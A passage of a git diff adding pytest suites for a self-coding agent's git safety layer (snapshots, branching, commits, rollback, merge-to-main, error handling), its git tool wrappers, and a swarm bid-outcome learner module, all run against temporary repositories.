assert dirty_snapshot.clean is False
|
||||
|
||||
async def test_snapshot_with_tests(self, git_safety, temp_git_repo):
|
||||
"""Should run tests and capture status."""
|
||||
# Create a passing test
|
||||
(temp_git_repo / "test_pass.py").write_text("""
|
||||
def test_pass():
|
||||
assert True
|
||||
""")
|
||||
safety = GitSafety(
|
||||
repo_path=temp_git_repo,
|
||||
test_command="python -m pytest test_pass.py -v",
|
||||
)
|
||||
|
||||
snapshot = await safety.snapshot(run_tests=True)
|
||||
assert snapshot.test_status is True
|
||||
assert "passed" in snapshot.test_output.lower() or "no tests" not in snapshot.test_output
|
||||
|
||||
|
||||
@pytest.mark.asyncio
|
||||
class TestGitSafetyBranching:
|
||||
"""Branch creation and management."""
|
||||
|
||||
async def test_create_branch(self, git_safety):
|
||||
"""Should create and checkout new branch."""
|
||||
safety = git_safety
|
||||
|
||||
branch_name = "timmy/self-edit/test"
|
||||
result = await safety.create_branch(branch_name)
|
||||
|
||||
assert result == branch_name
|
||||
assert await safety.get_current_branch() == branch_name
|
||||
|
||||
async def test_create_branch_from_main(self, git_safety, temp_git_repo):
|
||||
"""New branch should start from main."""
|
||||
safety = git_safety
|
||||
|
||||
main_commit = await safety.get_current_commit()
|
||||
|
||||
await safety.create_branch("feature-branch")
|
||||
branch_commit = await safety.get_current_commit()
|
||||
|
||||
assert branch_commit == main_commit
|
||||
|
||||
|
||||
@pytest.mark.asyncio
|
||||
class TestGitSafetyCommit:
|
||||
"""Commit operations."""
|
||||
|
||||
async def test_commit_specific_files(self, git_safety, temp_git_repo):
|
||||
"""Should commit only specified files."""
|
||||
safety = git_safety
|
||||
|
||||
# Create two files
|
||||
(temp_git_repo / "file1.txt").write_text("content1")
|
||||
(temp_git_repo / "file2.txt").write_text("content2")
|
||||
|
||||
# Commit only file1
|
||||
commit_hash = await safety.commit("Add file1", ["file1.txt"])
|
||||
|
||||
assert len(commit_hash) == 40
|
||||
|
||||
# file2 should still be uncommitted
|
||||
assert await safety.is_clean() is False
|
||||
|
||||
async def test_commit_all_changes(self, git_safety, temp_git_repo):
|
||||
"""Should commit all changes when no files specified."""
|
||||
safety = git_safety
|
||||
|
||||
(temp_git_repo / "new.txt").write_text("new content")
|
||||
|
||||
commit_hash = await safety.commit("Add new file")
|
||||
|
||||
assert len(commit_hash) == 40
|
||||
assert await safety.is_clean() is True
|
||||
|
||||
async def test_commit_no_changes(self, git_safety):
|
||||
"""Should handle commit with no changes gracefully."""
|
||||
safety = git_safety
|
||||
|
||||
commit_hash = await safety.commit("No changes")
|
||||
|
||||
# Should return current commit when no changes
|
||||
current = await safety.get_current_commit()
|
||||
assert commit_hash == current
|
||||
|
||||
|
||||
@pytest.mark.asyncio
|
||||
class TestGitSafetyDiff:
|
||||
"""Diff operations."""
|
||||
|
||||
async def test_get_diff(self, git_safety, temp_git_repo):
|
||||
"""Should return diff between commits."""
|
||||
safety = git_safety
|
||||
|
||||
original_commit = await safety.get_current_commit()
|
||||
|
||||
# Make a change and commit
|
||||
(temp_git_repo / "new.txt").write_text("new content")
|
||||
await safety.commit("Add new file")
|
||||
|
||||
new_commit = await safety.get_current_commit()
|
||||
|
||||
diff = await safety.get_diff(original_commit, new_commit)
|
||||
|
||||
assert "new.txt" in diff
|
||||
assert "new content" in diff
|
||||
|
||||
async def test_get_modified_files(self, git_safety, temp_git_repo):
|
||||
"""Should list modified files."""
|
||||
safety = git_safety
|
||||
|
||||
original_commit = await safety.get_current_commit()
|
||||
|
||||
(temp_git_repo / "file1.txt").write_text("content")
|
||||
(temp_git_repo / "file2.txt").write_text("content")
|
||||
await safety.commit("Add files")
|
||||
|
||||
files = await safety.get_modified_files(original_commit)
|
||||
|
||||
assert "file1.txt" in files
|
||||
assert "file2.txt" in files
|
||||
|
||||
|
||||
@pytest.mark.asyncio
|
||||
class TestGitSafetyRollback:
|
||||
"""Rollback functionality."""
|
||||
|
||||
async def test_rollback_to_snapshot(self, git_safety, temp_git_repo):
|
||||
"""Should rollback to snapshot state."""
|
||||
safety = git_safety
|
||||
|
||||
# Take snapshot
|
||||
snapshot = await safety.snapshot(run_tests=False)
|
||||
original_commit = snapshot.commit_hash
|
||||
|
||||
# Make change and commit
|
||||
(temp_git_repo / "feature.txt").write_text("feature")
|
||||
await safety.commit("Add feature")
|
||||
|
||||
# Verify we're on new commit
|
||||
new_commit = await safety.get_current_commit()
|
||||
assert new_commit != original_commit
|
||||
|
||||
# Rollback
|
||||
rolled_back = await safety.rollback(snapshot)
|
||||
|
||||
assert rolled_back == original_commit
|
||||
assert await safety.get_current_commit() == original_commit
|
||||
|
||||
async def test_rollback_discards_uncommitted_changes(self, git_safety, temp_git_repo):
|
||||
"""Rollback should discard uncommitted changes."""
|
||||
safety = git_safety
|
||||
|
||||
snapshot = await safety.snapshot(run_tests=False)
|
||||
|
||||
# Create uncommitted file
|
||||
dirty_file = temp_git_repo / "dirty.txt"
|
||||
dirty_file.write_text("dirty content")
|
||||
|
||||
assert dirty_file.exists()
|
||||
|
||||
# Rollback
|
||||
await safety.rollback(snapshot)
|
||||
|
||||
# Uncommitted file should be gone
|
||||
assert not dirty_file.exists()
|
||||
|
||||
async def test_rollback_to_commit_hash(self, git_safety, temp_git_repo):
|
||||
"""Should rollback to raw commit hash."""
|
||||
safety = git_safety
|
||||
|
||||
original_commit = await safety.get_current_commit()
|
||||
|
||||
# Make change
|
||||
(temp_git_repo / "temp.txt").write_text("temp")
|
||||
await safety.commit("Temp commit")
|
||||
|
||||
# Rollback using hash string
|
||||
await safety.rollback(original_commit)
|
||||
|
||||
assert await safety.get_current_commit() == original_commit
|
||||
|
||||
|
||||
@pytest.mark.asyncio
|
||||
class TestGitSafetyMerge:
|
||||
"""Merge operations."""
|
||||
|
||||
async def test_merge_to_main_success(self, git_safety, temp_git_repo):
|
||||
"""Should merge feature branch into main when tests pass."""
|
||||
safety = git_safety
|
||||
|
||||
main_commit_before = await safety.get_current_commit()
|
||||
|
||||
# Create feature branch
|
||||
await safety.create_branch("feature/test")
|
||||
(temp_git_repo / "feature.txt").write_text("feature")
|
||||
await safety.commit("Add feature")
|
||||
feature_commit = await safety.get_current_commit()
|
||||
|
||||
# Merge back to main (tests pass with echo command)
|
||||
merge_commit = await safety.merge_to_main("feature/test", require_tests=False)
|
||||
|
||||
# Should be on main with new merge commit
|
||||
assert await safety.get_current_branch() == "main"
|
||||
assert await safety.get_current_commit() == merge_commit
|
||||
assert merge_commit != main_commit_before
|
||||
|
||||
async def test_merge_to_main_with_tests_failure(self, git_safety, temp_git_repo):
|
||||
"""Should not merge when tests fail."""
|
||||
safety = GitSafety(
|
||||
repo_path=temp_git_repo,
|
||||
test_command="exit 1", # Always fails
|
||||
)
|
||||
|
||||
# Create feature branch
|
||||
await safety.create_branch("feature/failing")
|
||||
(temp_git_repo / "fail.txt").write_text("fail")
|
||||
await safety.commit("Add failing feature")
|
||||
|
||||
# Merge should fail due to tests
|
||||
with pytest.raises(GitOperationError) as exc_info:
|
||||
await safety.merge_to_main("feature/failing", require_tests=True)
|
||||
|
||||
assert "tests failed" in str(exc_info.value).lower() or "cannot merge" in str(exc_info.value).lower()
|
||||
|
||||
|
||||
@pytest.mark.asyncio
|
||||
class TestGitSafetyIntegration:
|
||||
"""Full workflow integration tests."""
|
||||
|
||||
async def test_full_self_edit_workflow(self, temp_git_repo):
|
||||
"""Complete workflow: snapshot → branch → edit → commit → merge."""
|
||||
safety = GitSafety(
|
||||
repo_path=temp_git_repo,
|
||||
test_command="echo 'tests pass'",
|
||||
)
|
||||
|
||||
# 1. Take snapshot
|
||||
snapshot = await safety.snapshot(run_tests=False)
|
||||
|
||||
# 2. Create feature branch
|
||||
branch = await safety.create_branch("timmy/self-edit/test-feature")
|
||||
|
||||
# 3. Make edits
|
||||
(temp_git_repo / "src" / "feature.py").parent.mkdir(parents=True, exist_ok=True)
|
||||
(temp_git_repo / "src" / "feature.py").write_text("""
|
||||
def new_feature():
|
||||
return "Hello from new feature!"
|
||||
""")
|
||||
|
||||
# 4. Commit
|
||||
commit = await safety.commit("Add new feature", ["src/feature.py"])
|
||||
|
||||
# 5. Merge to main
|
||||
merge_commit = await safety.merge_to_main(branch, require_tests=False)
|
||||
|
||||
# Verify state
|
||||
assert await safety.get_current_branch() == "main"
|
||||
assert (temp_git_repo / "src" / "feature.py").exists()
|
||||
|
||||
async def test_rollback_on_failure(self, temp_git_repo):
|
||||
"""Rollback workflow when changes need to be abandoned."""
|
||||
safety = GitSafety(
|
||||
repo_path=temp_git_repo,
|
||||
test_command="echo 'tests pass'",
|
||||
)
|
||||
|
||||
# Snapshot
|
||||
snapshot = await safety.snapshot(run_tests=False)
|
||||
original_commit = snapshot.commit_hash
|
||||
|
||||
# Create branch and make changes
|
||||
await safety.create_branch("timmy/self-edit/bad-feature")
|
||||
(temp_git_repo / "bad.py").write_text("# Bad code")
|
||||
await safety.commit("Add bad feature")
|
||||
|
||||
# Oops! Rollback
|
||||
await safety.rollback(snapshot)
|
||||
|
||||
# Should be back to original state
|
||||
assert await safety.get_current_commit() == original_commit
|
||||
assert not (temp_git_repo / "bad.py").exists()
|
||||
263
tests/self_coding/test_git_safety_errors.py
Normal file
263
tests/self_coding/test_git_safety_errors.py
Normal file
@@ -0,0 +1,263 @@
|
||||
"""Error path tests for Git Safety Layer.
|
||||
|
||||
Tests timeout handling, git failures, merge conflicts, and edge cases.
|
||||
"""
|
||||
|
||||
from __future__ import annotations
|
||||
|
||||
import subprocess
|
||||
import tempfile
|
||||
from pathlib import Path
|
||||
from unittest.mock import patch
|
||||
|
||||
import pytest
|
||||
|
||||
from self_coding.git_safety import (
|
||||
GitNotRepositoryError,
|
||||
GitOperationError,
|
||||
GitSafety,
|
||||
)
|
||||
|
||||
|
||||
@pytest.mark.asyncio
|
||||
class TestGitSafetyErrors:
|
||||
"""Git operation error handling."""
|
||||
|
||||
async def test_invalid_repo_path(self):
|
||||
"""Should raise GitNotRepositoryError for non-repo."""
|
||||
with tempfile.TemporaryDirectory() as tmpdir:
|
||||
with pytest.raises(GitNotRepositoryError):
|
||||
GitSafety(repo_path=tmpdir)
|
||||
|
||||
async def test_git_command_failure(self):
|
||||
"""Should raise GitOperationError on git failure."""
|
||||
with tempfile.TemporaryDirectory() as tmpdir:
|
||||
repo_path = Path(tmpdir)
|
||||
subprocess.run(["git", "init"], cwd=repo_path, check=True, capture_output=True)
|
||||
subprocess.run(["git", "config", "user.email", "test@test.com"], cwd=repo_path, check=True, capture_output=True)
|
||||
subprocess.run(["git", "config", "user.name", "Test"], cwd=repo_path, check=True, capture_output=True)
|
||||
|
||||
safety = GitSafety(repo_path=repo_path)
|
||||
|
||||
# Try to checkout non-existent branch
|
||||
with pytest.raises(GitOperationError):
|
||||
await safety._run_git("checkout", "nonexistent-branch")
|
||||
|
||||
async def test_merge_conflict_detection(self):
|
||||
"""Should handle merge conflicts gracefully."""
|
||||
with tempfile.TemporaryDirectory() as tmpdir:
|
||||
repo_path = Path(tmpdir)
|
||||
subprocess.run(["git", "init"], cwd=repo_path, check=True, capture_output=True)
|
||||
subprocess.run(["git", "config", "user.email", "test@test.com"], cwd=repo_path, check=True, capture_output=True)
|
||||
subprocess.run(["git", "config", "user.name", "Test"], cwd=repo_path, check=True, capture_output=True)
|
||||
|
||||
# Create initial file
|
||||
(repo_path / "file.txt").write_text("original")
|
||||
subprocess.run(["git", "add", "."], cwd=repo_path, check=True, capture_output=True)
|
||||
subprocess.run(["git", "commit", "-m", "Initial"], cwd=repo_path, check=True, capture_output=True)
|
||||
subprocess.run(["git", "branch", "-M", "main"], cwd=repo_path, check=True, capture_output=True)
|
||||
|
||||
safety = GitSafety(repo_path=repo_path)
|
||||
|
||||
# Create branch A with changes
|
||||
await safety.create_branch("branch-a")
|
||||
(repo_path / "file.txt").write_text("branch-a changes")
|
||||
await safety.commit("Branch A changes")
|
||||
|
||||
# Go back to main, create branch B with conflicting changes
|
||||
await safety._run_git("checkout", "main")
|
||||
await safety.create_branch("branch-b")
|
||||
(repo_path / "file.txt").write_text("branch-b changes")
|
||||
await safety.commit("Branch B changes")
|
||||
|
||||
# Try to merge branch-a into branch-b (will conflict)
|
||||
with pytest.raises(GitOperationError):
|
||||
await safety._run_git("merge", "branch-a")
|
||||
|
||||
async def test_rollback_after_merge(self):
|
||||
"""Should be able to rollback even after merge."""
|
||||
with tempfile.TemporaryDirectory() as tmpdir:
|
||||
repo_path = Path(tmpdir)
|
||||
subprocess.run(["git", "init"], cwd=repo_path, check=True, capture_output=True)
|
||||
subprocess.run(["git", "config", "user.email", "test@test.com"], cwd=repo_path, check=True, capture_output=True)
|
||||
subprocess.run(["git", "config", "user.name", "Test"], cwd=repo_path, check=True, capture_output=True)
|
||||
|
||||
safety = GitSafety(repo_path=repo_path)
|
||||
|
||||
# Initial commit
|
||||
(repo_path / "file.txt").write_text("v1")
|
||||
subprocess.run(["git", "add", "."], cwd=repo_path, check=True, capture_output=True)
|
||||
subprocess.run(["git", "commit", "-m", "v1"], cwd=repo_path, check=True, capture_output=True)
|
||||
|
||||
snapshot = await safety.snapshot(run_tests=False)
|
||||
|
||||
# Make changes and commit
|
||||
(repo_path / "file.txt").write_text("v2")
|
||||
await safety.commit("v2")
|
||||
|
||||
# Rollback
|
||||
await safety.rollback(snapshot)
|
||||
|
||||
# Verify
|
||||
content = (repo_path / "file.txt").read_text()
|
||||
assert content == "v1"
|
||||
|
||||
async def test_snapshot_with_failing_tests(self):
|
||||
"""Snapshot should capture failing test status."""
|
||||
with tempfile.TemporaryDirectory() as tmpdir:
|
||||
repo_path = Path(tmpdir)
|
||||
subprocess.run(["git", "init"], cwd=repo_path, check=True, capture_output=True)
|
||||
subprocess.run(["git", "config", "user.email", "test@test.com"], cwd=repo_path, check=True, capture_output=True)
|
||||
subprocess.run(["git", "config", "user.name", "Test"], cwd=repo_path, check=True, capture_output=True)
|
||||
|
||||
# Need an initial commit for HEAD to exist
|
||||
(repo_path / "initial.txt").write_text("initial")
|
||||
subprocess.run(["git", "add", "."], cwd=repo_path, check=True, capture_output=True)
|
||||
subprocess.run(["git", "commit", "-m", "Initial"], cwd=repo_path, check=True, capture_output=True)
|
||||
|
||||
# Create failing test
|
||||
(repo_path / "test_fail.py").write_text("def test_fail(): assert False")
|
||||
|
||||
safety = GitSafety(
|
||||
repo_path=repo_path,
|
||||
test_command="python -m pytest test_fail.py -v",
|
||||
)
|
||||
|
||||
snapshot = await safety.snapshot(run_tests=True)
|
||||
|
||||
assert snapshot.test_status is False
|
||||
assert "FAILED" in snapshot.test_output or "failed" in snapshot.test_output.lower()
|
||||
|
||||
async def test_get_diff_between_commits(self):
|
||||
"""Should get diff between any two commits."""
|
||||
with tempfile.TemporaryDirectory() as tmpdir:
|
||||
repo_path = Path(tmpdir)
|
||||
subprocess.run(["git", "init"], cwd=repo_path, check=True, capture_output=True)
|
||||
subprocess.run(["git", "config", "user.email", "test@test.com"], cwd=repo_path, check=True, capture_output=True)
|
||||
subprocess.run(["git", "config", "user.name", "Test"], cwd=repo_path, check=True, capture_output=True)
|
||||
|
||||
safety = GitSafety(repo_path=repo_path)
|
||||
|
||||
# Commit 1
|
||||
(repo_path / "file.txt").write_text("version 1")
|
||||
subprocess.run(["git", "add", "."], cwd=repo_path, check=True, capture_output=True)
|
||||
subprocess.run(["git", "commit", "-m", "v1"], cwd=repo_path, check=True, capture_output=True)
|
||||
commit1 = await safety.get_current_commit()
|
||||
|
||||
# Commit 2
|
||||
(repo_path / "file.txt").write_text("version 2")
|
||||
await safety.commit("v2")
|
||||
commit2 = await safety.get_current_commit()
|
||||
|
||||
# Get diff
|
||||
diff = await safety.get_diff(commit1, commit2)
|
||||
|
||||
assert "version 1" in diff
|
||||
assert "version 2" in diff
|
||||
|
||||
async def test_is_clean_with_untracked_files(self):
|
||||
"""is_clean should return False with untracked files (they count as changes)."""
|
||||
with tempfile.TemporaryDirectory() as tmpdir:
|
||||
repo_path = Path(tmpdir)
|
||||
subprocess.run(["git", "init"], cwd=repo_path, check=True, capture_output=True)
|
||||
subprocess.run(["git", "config", "user.email", "test@test.com"], cwd=repo_path, check=True, capture_output=True)
|
||||
subprocess.run(["git", "config", "user.name", "Test"], cwd=repo_path, check=True, capture_output=True)
|
||||
|
||||
# Need an initial commit for HEAD to exist
|
||||
(repo_path / "initial.txt").write_text("initial")
|
||||
subprocess.run(["git", "add", "."], cwd=repo_path, check=True, capture_output=True)
|
||||
subprocess.run(["git", "commit", "-m", "Initial"], cwd=repo_path, check=True, capture_output=True)
|
||||
|
||||
safety = GitSafety(repo_path=repo_path)
|
||||
|
||||
# Verify clean state first
|
||||
assert await safety.is_clean() is True
|
||||
|
||||
# Create untracked file
|
||||
(repo_path / "untracked.txt").write_text("untracked")
|
||||
|
||||
# is_clean returns False when there are untracked files
|
||||
# (git status --porcelain shows ?? for untracked)
|
||||
assert await safety.is_clean() is False
|
||||
|
||||
async def test_empty_commit_allowed(self):
|
||||
"""Should allow empty commits when requested."""
|
||||
with tempfile.TemporaryDirectory() as tmpdir:
|
||||
repo_path = Path(tmpdir)
|
||||
subprocess.run(["git", "init"], cwd=repo_path, check=True, capture_output=True)
|
||||
subprocess.run(["git", "config", "user.email", "test@test.com"], cwd=repo_path, check=True, capture_output=True)
|
||||
subprocess.run(["git", "config", "user.name", "Test"], cwd=repo_path, check=True, capture_output=True)
|
||||
|
||||
# Initial commit
|
||||
(repo_path / "file.txt").write_text("content")
|
||||
subprocess.run(["git", "add", "."], cwd=repo_path, check=True, capture_output=True)
|
||||
subprocess.run(["git", "commit", "-m", "Initial"], cwd=repo_path, check=True, capture_output=True)
|
||||
|
||||
safety = GitSafety(repo_path=repo_path)
|
||||
|
||||
# Empty commit
|
||||
commit_hash = await safety.commit("Empty commit message", allow_empty=True)
|
||||
|
||||
assert len(commit_hash) == 40
|
||||
|
||||
async def test_modified_files_detection(self):
|
||||
"""Should detect which files were modified."""
|
||||
with tempfile.TemporaryDirectory() as tmpdir:
|
||||
repo_path = Path(tmpdir)
|
||||
subprocess.run(["git", "init"], cwd=repo_path, check=True, capture_output=True)
|
||||
subprocess.run(["git", "config", "user.email", "test@test.com"], cwd=repo_path, check=True, capture_output=True)
|
||||
subprocess.run(["git", "config", "user.name", "Test"], cwd=repo_path, check=True, capture_output=True)
|
||||
|
||||
safety = GitSafety(repo_path=repo_path)
|
||||
|
||||
# Initial commits
|
||||
(repo_path / "file1.txt").write_text("content1")
|
||||
(repo_path / "file2.txt").write_text("content2")
|
||||
subprocess.run(["git", "add", "."], cwd=repo_path, check=True, capture_output=True)
|
||||
subprocess.run(["git", "commit", "-m", "Initial"], cwd=repo_path, check=True, capture_output=True)
|
||||
|
||||
base_commit = await safety.get_current_commit()
|
||||
|
||||
# Modify only file1
|
||||
(repo_path / "file1.txt").write_text("modified content")
|
||||
await safety.commit("Modify file1")
|
||||
|
||||
# Get modified files
|
||||
modified = await safety.get_modified_files(base_commit)
|
||||
|
||||
assert "file1.txt" in modified
|
||||
assert "file2.txt" not in modified
|
||||
|
||||
async def test_branch_switching(self):
|
||||
"""Should handle switching between branches."""
|
||||
with tempfile.TemporaryDirectory() as tmpdir:
|
||||
repo_path = Path(tmpdir)
|
||||
subprocess.run(["git", "init"], cwd=repo_path, check=True, capture_output=True)
|
||||
subprocess.run(["git", "config", "user.email", "test@test.com"], cwd=repo_path, check=True, capture_output=True)
|
||||
subprocess.run(["git", "config", "user.name", "Test"], cwd=repo_path, check=True, capture_output=True)
|
||||
|
||||
# Initial commit on master (default branch name)
|
||||
(repo_path / "main.txt").write_text("main branch content")
|
||||
subprocess.run(["git", "add", "."], cwd=repo_path, check=True, capture_output=True)
|
||||
subprocess.run(["git", "commit", "-m", "Initial"], cwd=repo_path, check=True, capture_output=True)
|
||||
# Rename to main for consistency
|
||||
subprocess.run(["git", "branch", "-M", "main"], cwd=repo_path, check=True, capture_output=True)
|
||||
|
||||
safety = GitSafety(repo_path=repo_path, main_branch="main")
|
||||
|
||||
# Create feature branch
|
||||
await safety.create_branch("feature")
|
||||
(repo_path / "feature.txt").write_text("feature content")
|
||||
await safety.commit("Add feature")
|
||||
|
||||
# Switch back to main
|
||||
await safety._run_git("checkout", "main")
|
||||
|
||||
# Verify main doesn't have feature.txt
|
||||
assert not (repo_path / "feature.txt").exists()
|
||||
|
||||
# Switch to feature
|
||||
await safety._run_git("checkout", "feature")
|
||||
|
||||
# Verify feature has feature.txt
|
||||
assert (repo_path / "feature.txt").exists()
|
||||
183
tests/self_coding/test_git_tools.py
Normal file
183
tests/self_coding/test_git_tools.py
Normal file
@@ -0,0 +1,183 @@
|
||||
"""Tests for tools.git_tools — Git operations for Forge/Helm personas.
|
||||
|
||||
All tests use temporary git repositories to avoid touching the real
|
||||
working tree.
|
||||
"""
|
||||
|
||||
import pytest
|
||||
from pathlib import Path
|
||||
|
||||
from tools.git_tools import (
|
||||
git_init,
|
||||
git_status,
|
||||
git_add,
|
||||
git_commit,
|
||||
git_log,
|
||||
git_diff,
|
||||
git_branch,
|
||||
git_stash,
|
||||
git_blame,
|
||||
git_clone,
|
||||
GIT_TOOL_CATALOG,
|
||||
)
|
||||
|
||||
|
||||
@pytest.fixture
|
||||
def git_repo(tmp_path):
|
||||
"""Create a temporary git repo with one commit."""
|
||||
result = git_init(tmp_path)
|
||||
assert result["success"]
|
||||
|
||||
# Configure git identity for commits
|
||||
from git import Repo
|
||||
repo = Repo(str(tmp_path))
|
||||
repo.config_writer().set_value("user", "name", "Test").release()
|
||||
repo.config_writer().set_value("user", "email", "test@test.com").release()
|
||||
|
||||
# Create initial commit
|
||||
readme = tmp_path / "README.md"
|
||||
readme.write_text("# Test Repo\n")
|
||||
repo.index.add(["README.md"])
|
||||
repo.index.commit("Initial commit")
|
||||
|
||||
return tmp_path
|
||||
|
||||
|
||||
class TestGitInit:
|
||||
def test_init_creates_repo(self, tmp_path):
|
||||
path = tmp_path / "new_repo"
|
||||
result = git_init(path)
|
||||
assert result["success"]
|
||||
assert (path / ".git").is_dir()
|
||||
|
||||
def test_init_returns_path(self, tmp_path):
|
||||
path = tmp_path / "repo"
|
||||
result = git_init(path)
|
||||
assert result["path"] == str(path)
|
||||
|
||||
|
||||
class TestGitStatus:
|
||||
def test_clean_repo(self, git_repo):
|
||||
result = git_status(git_repo)
|
||||
assert result["success"]
|
||||
assert result["is_dirty"] is False
|
||||
assert result["untracked"] == []
|
||||
|
||||
def test_dirty_repo_untracked(self, git_repo):
|
||||
(git_repo / "new_file.txt").write_text("hello")
|
||||
result = git_status(git_repo)
|
||||
assert result["is_dirty"] is True
|
||||
assert "new_file.txt" in result["untracked"]
|
||||
|
||||
def test_reports_branch(self, git_repo):
|
||||
result = git_status(git_repo)
|
||||
assert result["branch"] in ("main", "master")
|
||||
|
||||
|
||||
class TestGitAddCommit:
|
||||
def test_add_and_commit(self, git_repo):
|
||||
(git_repo / "test.py").write_text("print('hi')\n")
|
||||
add_result = git_add(git_repo, ["test.py"])
|
||||
assert add_result["success"]
|
||||
|
||||
commit_result = git_commit(git_repo, "Add test.py")
|
||||
assert commit_result["success"]
|
||||
assert len(commit_result["sha"]) == 40
|
||||
assert commit_result["message"] == "Add test.py"
|
||||
|
||||
def test_add_all(self, git_repo):
|
||||
(git_repo / "a.txt").write_text("a")
|
||||
(git_repo / "b.txt").write_text("b")
|
||||
result = git_add(git_repo)
|
||||
assert result["success"]
|
||||
|
||||
|
||||
class TestGitLog:
|
||||
def test_log_returns_commits(self, git_repo):
|
||||
result = git_log(git_repo)
|
||||
assert result["success"]
|
||||
assert len(result["commits"]) >= 1
|
||||
first = result["commits"][0]
|
||||
assert "sha" in first
|
||||
assert "message" in first
|
||||
assert "author" in first
|
||||
assert "date" in first
|
||||
|
||||
def test_log_max_count(self, git_repo):
|
||||
result = git_log(git_repo, max_count=1)
|
||||
assert len(result["commits"]) == 1
|
||||
|
||||
|
||||
class TestGitDiff:
|
||||
def test_no_diff_on_clean(self, git_repo):
|
||||
result = git_diff(git_repo)
|
||||
assert result["success"]
|
||||
assert result["diff"] == ""
|
||||
|
||||
def test_diff_on_modified(self, git_repo):
|
||||
readme = git_repo / "README.md"
|
||||
readme.write_text("# Modified\n")
|
||||
result = git_diff(git_repo)
|
||||
assert result["success"]
|
||||
assert "Modified" in result["diff"]
|
||||
|
||||
|
||||
class TestGitBranch:
|
||||
def test_list_branches(self, git_repo):
|
||||
result = git_branch(git_repo)
|
||||
assert result["success"]
|
||||
assert len(result["branches"]) >= 1
|
||||
|
||||
def test_create_branch(self, git_repo):
|
||||
result = git_branch(git_repo, create="feature-x")
|
||||
assert result["success"]
|
||||
assert "feature-x" in result["branches"]
|
||||
assert result["created"] == "feature-x"
|
||||
|
||||
def test_switch_branch(self, git_repo):
|
||||
git_branch(git_repo, create="dev")
|
||||
result = git_branch(git_repo, switch="dev")
|
||||
assert result["active"] == "dev"
|
||||
|
||||
|
||||
class TestGitStash:
|
||||
def test_stash_and_pop(self, git_repo):
|
||||
readme = git_repo / "README.md"
|
||||
readme.write_text("# Changed\n")
|
||||
|
||||
stash_result = git_stash(git_repo, message="wip")
|
||||
assert stash_result["success"]
|
||||
assert stash_result["action"] == "stash"
|
||||
|
||||
# Working tree should be clean after stash
|
||||
status = git_status(git_repo)
|
||||
assert status["is_dirty"] is False
|
||||
|
||||
# Pop restores changes
|
||||
pop_result = git_stash(git_repo, pop=True)
|
||||
assert pop_result["success"]
|
||||
assert pop_result["action"] == "pop"
|
||||
|
||||
|
||||
class TestGitBlame:
|
||||
def test_blame_file(self, git_repo):
|
||||
result = git_blame(git_repo, "README.md")
|
||||
assert result["success"]
|
||||
assert "Test Repo" in result["blame"]
|
||||
|
||||
|
||||
class TestGitToolCatalog:
|
||||
def test_catalog_has_all_tools(self):
|
||||
expected = {
|
||||
"git_clone", "git_status", "git_diff", "git_log",
|
||||
"git_blame", "git_branch", "git_add", "git_commit",
|
||||
"git_push", "git_pull", "git_stash",
|
||||
}
|
||||
assert expected == set(GIT_TOOL_CATALOG.keys())
|
||||
|
||||
def test_catalog_entries_have_required_keys(self):
|
||||
for tool_id, info in GIT_TOOL_CATALOG.items():
|
||||
assert "name" in info, f"{tool_id} missing name"
|
||||
assert "description" in info, f"{tool_id} missing description"
|
||||
assert "fn" in info, f"{tool_id} missing fn"
|
||||
assert callable(info["fn"]), f"{tool_id} fn not callable"
|
||||
237
tests/self_coding/test_learner.py
Normal file
237
tests/self_coding/test_learner.py
Normal file
@@ -0,0 +1,237 @@
|
||||
"""Tests for swarm.learner — outcome tracking and adaptive bid intelligence."""
|
||||
|
||||
import pytest
|
||||
|
||||
|
||||
@pytest.fixture(autouse=True)
|
||||
def tmp_learner_db(tmp_path, monkeypatch):
|
||||
db_path = tmp_path / "swarm.db"
|
||||
monkeypatch.setattr("swarm.learner.DB_PATH", db_path)
|
||||
yield db_path
|
||||
|
||||
|
||||
# ── keyword extraction ───────────────────────────────────────────────────────
|
||||
|
||||
def test_extract_keywords_strips_stop_words():
|
||||
from swarm.learner import _extract_keywords
|
||||
kws = _extract_keywords("please research the security vulnerability")
|
||||
assert "please" not in kws
|
||||
assert "the" not in kws
|
||||
assert "research" in kws
|
||||
assert "security" in kws
|
||||
assert "vulnerability" in kws
|
||||
|
||||
|
||||
def test_extract_keywords_ignores_short_words():
|
||||
from swarm.learner import _extract_keywords
|
||||
kws = _extract_keywords("do it or go")
|
||||
assert kws == []
|
||||
|
||||
|
||||
def test_extract_keywords_lowercases():
|
||||
from swarm.learner import _extract_keywords
|
||||
kws = _extract_keywords("Deploy Kubernetes Cluster")
|
||||
assert "deploy" in kws
|
||||
assert "kubernetes" in kws
|
||||
assert "cluster" in kws
|
||||
|
||||
|
||||
# ── record_outcome ───────────────────────────────────────────────────────────
|
||||
|
||||
def test_record_outcome_stores_data():
|
||||
from swarm.learner import record_outcome, get_metrics
|
||||
record_outcome("t1", "agent-a", "fix the bug", 30, won_auction=True)
|
||||
m = get_metrics("agent-a")
|
||||
assert m.total_bids == 1
|
||||
assert m.auctions_won == 1
|
||||
|
||||
|
||||
def test_record_outcome_with_failure():
|
||||
from swarm.learner import record_outcome, get_metrics
|
||||
record_outcome("t2", "agent-b", "deploy server", 50, won_auction=True, task_succeeded=False)
|
||||
m = get_metrics("agent-b")
|
||||
assert m.tasks_failed == 1
|
||||
assert m.success_rate == 0.0
|
||||
|
||||
|
||||
def test_record_outcome_losing_bid():
|
||||
from swarm.learner import record_outcome, get_metrics
|
||||
record_outcome("t3", "agent-c", "write docs", 80, won_auction=False)
|
||||
m = get_metrics("agent-c")
|
||||
assert m.total_bids == 1
|
||||
assert m.auctions_won == 0
|
||||
|
||||
|
||||
# ── record_task_result ───────────────────────────────────────────────────────
|
||||
|
||||
def test_record_task_result_updates_success():
|
||||
from swarm.learner import record_outcome, record_task_result, get_metrics
|
||||
record_outcome("t4", "agent-d", "analyse data", 40, won_auction=True)
|
||||
updated = record_task_result("t4", "agent-d", succeeded=True)
|
||||
assert updated == 1
|
||||
m = get_metrics("agent-d")
|
||||
assert m.tasks_completed == 1
|
||||
assert m.success_rate == 1.0
|
||||
|
||||
|
||||
def test_record_task_result_updates_failure():
|
||||
from swarm.learner import record_outcome, record_task_result, get_metrics
|
||||
record_outcome("t5", "agent-e", "deploy kubernetes", 60, won_auction=True)
|
||||
record_task_result("t5", "agent-e", succeeded=False)
|
||||
m = get_metrics("agent-e")
|
||||
assert m.tasks_failed == 1
|
||||
assert m.success_rate == 0.0
|
||||
|
||||
|
||||
def test_record_task_result_no_match_returns_zero():
|
||||
from swarm.learner import record_task_result
|
||||
updated = record_task_result("no-task", "no-agent", succeeded=True)
|
||||
assert updated == 0
|
||||
|
||||
|
||||
